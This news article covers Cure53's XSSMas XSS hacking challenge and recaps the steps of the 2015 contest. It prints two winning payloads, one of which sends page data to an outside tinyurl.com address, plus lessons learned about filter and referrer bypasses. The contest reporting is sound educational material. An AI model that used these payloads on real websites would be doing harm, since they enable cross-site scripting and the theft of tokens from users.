Cure53 XSSMas Hacking Challenge 2016 Underway
Written by Nikos Vaggalis   
Thursday, 22 December 2016

Cure53 XSSMas Challenge, initiated in 2013, is a recurring hacking event, where those challenged have to solve a complex security puzzle in order to win money and fame, attempting to hack a web site in any means necessary. 

'Any means', does not preclude rules of engagement. For example the 2015 challenge required hacking without user interaction, i.e setting a XSS trap and waiting for it to be activated as in the case of blind XSS.

cure53

So as not to spoil your fun with this year's challenge, which has been posted today, here we'll look back to last year's challenge required hackers to begin with index.php and progressively break through index3.php in order to obtain the price.

What was actually required is nicely summed up in:

  • Find a way to bypass the XSS filters of all browsers by realizing, the string <script> is being stripped
  • Find a way to execute the injected script on index.php without user interaction   
  • Then steal the token from token.php to get to index2.php
  • There you would have to either bypass the AngularJS sandbox or create a very long submission with the implicit bypass we created for you   
  • Or be smart and realize, that you can bypass index2.php completely by messing with the referrer   
  • Then to enter index3.php and create XSS without user interaction again, despite the much harder conditions here

The solution that cracked it first is summed up in the next 154 bytes of 'obfuscated' code: 


'onfocus<script>=location.href=
"//tinyurl.com/zr5n38y?%2526"%
2bscripts[0].src.slice(42)%2b"%23x"+
id=x+tabindex=1#x

Prizes were also handed to the shortest in (135) bytes, most efficient solution, as well :


'style=transition:1s+id=x+onwebkittransitionend=oncut
=`<script>`?alert(URL):location=[`index3/index2.php`,
all[60].src,URL]+tabindex=1#x
 

Cure53 posts the complete samples, walk-throughs, solutions and lessons learned on their GitHub page, which apart from impressing also makes for very educational reading.

For example the lessons learned from last year's challenge were:

  • XSS without user interaction is still possible in most modern browsers.
  • XSS filters just need a bit of replacement done by a website to be universally bypassed.
  • ES6 is a great tool to optimize exploits.
  • CSS and XSS go very well together and finally...
  • Don't rely on flaky referrer based XSS protection.We built in this bug on purpose but we've seen many cases where this was not the case.

cure53

 

Challenges like this one don't offer much money-wise, last time an overall of 2.500,00 EUR was paid out to the winners, but are extremely valuable additions to a hacker's toolset, where XSSHunter and Hacksplaining should already be occupying a place. They are stepping stones in your professional career that prepare you for even bigger challenges such as those commissioned by bug bounty services like HackerOne where big names pay for discovering security vulnerabilities in their products.

That aside, act as means of funnelling the hacking creativity towards ethical and rewarding causes instead of letting the restless minds trying to satisfy their curiosity through other, less ethical and nefarious ways.

XSSMas Challenge 2016 has just been unveiled and you have until January 31st to solve it.

 

cure53sq

   

More Information

XSSMas Challenge 2016 

Cure53Berlin on Twitter

XSSMas Challenge 2015 on GitHub

Related Articles

XSSHunter for Pentesting

Hacksplaining learn through hacking

Tactical Pentesting With Burp Suite

 

To be informed about new articles on I Programmer, sign up for our weekly newsletter, subscribe to the RSS feed and follow us on Twitter, Facebook or Linkedin.

 

Banner


Apollo Adds REST APIs For GraphQL
29/10/2024

Apollo has added a simpler way to integrate REST APIs into a federated GraphQL environment. Available now in public preview, can be used to map REST API endpoints to their GraphQL schema using a decla [ ... ]



Apache Releases Tomcat 11
07/11/2024

Apache has announced the release of Tomcat 11, as well as marking the 25th anniversary of the first commit to the Apache Tomcat source code repository since becoming an ASF project.


More News

espbook

 

Comments




or email your comment to: comments@i-programmer.info

 

Last Updated ( Thursday, 22 December 2016 )